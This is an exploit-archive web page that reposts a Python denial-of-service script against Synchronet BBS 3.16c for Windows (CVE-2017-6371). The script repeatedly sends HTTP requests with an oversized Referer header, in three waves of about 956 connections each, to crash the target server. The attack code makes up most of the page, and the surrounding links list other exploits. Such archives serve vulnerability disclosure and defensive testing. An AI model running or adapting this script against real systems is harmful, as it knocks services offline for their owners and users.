首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Synchronet BBS 3.16c - Denial of Service 来源：vfocus.net 作者：Baris 发布时间：2017-03-01   # Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities # Date: 2017-02-28 # Exploit Author: Peter Baris # Vendor Homepage: http://www.saptech-erp.com.au # Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip # Version: 3.16c for Windows # Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64 # CVE : CVE-2017-6371   import socket import time import sys   try:     host = sys.argv[1]     port = 80 except IndexError:     print "[+] Usage %s <host>  " % sys.argv[0]     sys.exit()     exploit = "\x41"*4096   buffer = "GET /index.ssjs HTTP/1.1\r\n" buffer+= "Host: 192.168.198.129\r\n" buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n" buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\ r\n" buffer+="Accept-Language: en-US,en;q=0.5\r\n" buffer+="Accept-Encoding: gzip, deflate\r\n" buffer+="Referer: "+exploit+"\r\n" buffer+="Connection: keep-alive\r\n" buffer+="Content-Type: application/x-www-form-urlencoded\r\n" buffer+="Content-Length: 5900\r\n\r\n"   i = 1 while i < 957:     try:         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)         connect=s.connect((host,port))         print("[*] Try: "+str(i))         s.send(buffer)         s.close()         i=i+1     except:         print("[-] The service seems to be down\r\n")         break     print("[i] Waiting a few seconds before starting a second attack.\r\n") time.sleep(25) print("[*] Second run to trigger the DoS") i = 1 while i < 957:         try:         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)                 connect=s.connect((host,port))                 print("[*] Try: "+str(i))                 s.send(buffer)                 s.close()                 i=i+1         except:                 print("[-] The service seems to be down.\r\n")                 break   print("[i] Wait before the final strike.\r\n") time.sleep(25) print("[*] Third run to trigger the DoS") i = 1 while i < 957:         try:                 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)                 connect=s.connect((host,port))                 print("[*] Try: "+str(i))                 s.send(buffer)                 s.close()                 i=i+1         except:                 print("[-] The service seems to be down.\r\n")                 print("[!] It can take a few seconds for the service to crash\r\n")                 break   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·BlueIris 4.5.1.4 - Denial of S ·SysGauge 1.5.18 - Buffer Overf ·Blizard BB 1.7 (privtmsg) MD5 ·MikroTik Router Denial Of Serv ·Grails PDF Plugin 0.6 - XML Ex ·pfSense 2.3.2 Cross Site Reque ·NETGEAR DGN2200v1/v2/v3/v4 - ' ·Ektron 8.5 / 8.7 / 9.0 XSLT Tr ·MVPower DVR Shell Unauthentica ·FTPShell Client 6.53 - Buffer ·Trend Micro InterScan Messagin ·Conext ComBox 865-1058 - Denia   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved